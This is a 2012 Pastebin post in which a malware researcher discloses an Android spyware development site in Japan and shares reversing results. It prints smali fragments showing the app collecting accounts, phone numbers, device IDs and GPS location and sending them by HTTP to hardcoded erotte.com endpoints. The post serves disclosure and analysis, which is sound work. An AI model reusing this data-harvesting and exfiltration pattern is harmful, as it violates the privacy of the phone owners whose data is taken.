SHARE
TWEET

Exposing the Android Fraud #Malware Development Site

unixfreaxjp Mar 16th, 2012 715 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. I discosed a malware development site I found in Japan network
  2. report is in here: http://goo.gl/j6pdD (english) , or
  3. http://unixfreaxjp.blogspot.com/2012/03/ocjp-026.html (japanese)
  4.  
  5. My malware analysis / reversing result:
  6. /*-----------------------------
  7. GET THE SYSTEM PRIVATE DATA
  8. -----------------------------*/
  9.  
  10. //accessing the systems sensitive data
  11.  
  12. getSystemService(Ljava/lang/String;)
  13. getAccounts()[Landroid/accounts/Account;
  14. invoke-virtual/range {v16 .. v16}, Landroid/telephony/TelephonyManager;
  15. ->getLine1Number()Ljava/lang/String;
  16. Landroid/location/Location;->getLatitude()D
  17.  
  18. Lcom/example/android/service/Main;->mLocationManager:Landroid/location/LocationManager;
  19. invoke-virtual {v0, v1}, Landroid/location/LocationManager;
  20. ->getLastKnownLocation(Ljava/lang/String;)Landroid/location/Location;
  21.  
  22. //operations for getting device data & allocating to malware variables
  23.  
  24. Main(101)   : iget-object v0, p0, Lcom/example/android/service/Main;->dvino:Ljava/lang/String;
  25. Main(441)   : iput-object v1, v0, Lcom/example/android/service/Main;->dvino:Ljava/lang/String;
  26. vew2(62)    : iput-object v0, p0, Lcom/example/android/service/vew2;->dvino:Ljava/lang/String;
  27. vew2(295)   : iput-object v0, p0, Lcom/example/android/service/vew2;->dvino:Ljava/lang/String;
  28. vew2(304)   : iget-object v2, p0, Lcom/example/android/service/vew2;->dvino:Ljava/lang/String;
  29. Main(61)    : iput-object v0, p0, Lcom/example/android/service/Main;->dtnn:Ljava/lang/String;
  30. Main(123)   : iget-object v0, p0, Lcom/example/android/service/Main;->dtnn:Ljava/lang/String;
  31. Main(415)   : iput-object v1, v0, Lcom/example/android/service/Main;->dtnn:Ljava/lang/String;
  32. Main(483)   : iput-object v7, v0, Lcom/example/android/service/Main;->dtnn:Ljava/lang/String;
  33. Main(604)   : iget-object v3, p0, Lcom/example/android/service/Main;->dtnn:Ljava/lang/String;
  34. Main(51)    : iput-object v0, p0, Lcom/example/android/service/Main;->telno:Ljava/lang/String;
  35. Main(112)   : iget-object v0, p0, Lcom/example/android/service/Main;->telno:Ljava/lang/String;
  36. Main(432)   : iput-object v1, v0, Lcom/example/android/service/Main;->telno:Ljava/lang/String;
  37. Main(592)   : iget-object v3, p0, Lcom/example/android/service/Main;->telno:Ljava/lang/String;
  38.  
  39. /*-----------------------------
  40. HTTP COMUNICATION CALLS
  41. -----------------------------*/
  42.  
  43. //initial setting for http client
  44.  
  45. .local v3, method:Lorg/apache/http/client/methods/HttpGet;
  46.  
  47. //some methods http used for transaction
  48.  
  49. Lorg/apache/http/client/methods/HttpGet;-><init>(Ljava/lang/String;)V
  50. new-instance v0, Lorg/apache/http/impl/client/DefaultHttpClient;
  51. Lorg/apache/http/client/methods/HttpGet;->setHeader(Ljava/lang/String;Ljava/lang/String;)V
  52. Lorg/apache/http/impl/client/DefaultHttpClient;->execute(Lorg/apache/http/client/methods/HttpUriRequest;)Lorg/apache/http/HttpResponse;
  53. Lorg/apache/http/StatusLine;->getStatusCode()I
  54.  
  55. /*-----------------------------
  56. SPYWARE STRING BUILDER:
  57. -----------------------------*/
  58.  
  59. //initial variable for stolen strings..
  60.  
  61. .field private dtnn:Ljava/lang/String;
  62. .field private dvino:Ljava/lang/String;
  63. .field private telno:Ljava/lang/String;
  64. .field private m_addr:Ljava/lang/String;
  65. .field latitude:D
  66. .field longitude:D
  67. .field private mLocationManager:Landroid/location/LocationManager;
  68. .field private mVib:Landroid/os/Vibrator;
  69. .field private timer2:Ljava/util/Timer;
  70. .field private url:Ljava/lang/String;
  71. .field private end_f:Ljava/lang/Integer;
  72. .field final synthetic this$0:Lcom/example/android/service/vew2;
  73. .field final synthetic this$0:Lcom/example/android/service/Main;
  74. ..etc..etc..
  75.  
  76. // some initial data for string operations
  77.  
  78. const-string v3, "&telno="
  79. const-string v2, "&m_addr="
  80. const-string v2, "&dvino="
  81. const-string v3, "&dtnn="
  82. const-string v1, "&url="
  83. ...etc..etc..
  84.  
  85. //data acessed putting to the strings...
  86.  
  87. Lcom/example/android/service/Main;->mVib:Landroid/os/Vibrator;
  88. Lcom/example/android/service/Main;->dvino:Ljava/lang/String;
  89. Lcom/example/android/service/Main;->telno:Ljava/lang/String;
  90. Lcom/example/android/service/Main;->dtnn:Ljava/lang/String;
  91. Lcom/example/android/service/vew2;->mVib:Landroid/os/Vibrator;
  92. Lcom/example/android/service/vew2n;->telno:Ljava/lang/String;
  93.  
  94. /*-----------------------------
  95. SPYWARE - DATA SENT via HTTP:
  96. -----------------------------*/
  97.  
  98. //Building strings for sending.........
  99.  
  100. Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
  101. invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
  102. invoke-direct {v0, v1, v2}, Landroid/content/Intent;-><init>(Ljava/lang/String;Landroid/net/Uri;)V
  103.  
  104. //sent uri used
  105.  
  106. const-string Uri v2, "http://erotte.com/check.php?id=",
  107. "http://erotte.com/rgst5.php?gpsx=",
  108. "http://erotte.com/send.php?a_id="
  109.  
  110. //sent & registered android location
  111.  
  112. Main$1(116) :  const-string v3, "&gpsx="
  113. Main(610)   :  const-string v3, "&gpsx="
  114. Main$1(134) :  const-string v3, "&gpsy="
  115. Main(626)   :  const-string v3, "&gpsy="
  116. vew2$1(83)  :  const-string v3, "&gpsy="
  117. vew2(607)   :  const-string v3, "&gpsy="
  118. const-string v3, "http://erotte.com/rgst5.php?gpsx= ....gpsy..
  119.  
  120. ----
  121. Zero Day japan | http://0day.jp
  122. マルウェア研究所 malware research
  123. Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN (VT/Google/Twitter: @unixfreaxjp )
  124. Sponsored by: 株式会社ケイエルジェイテック http://www.kljtech.com
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top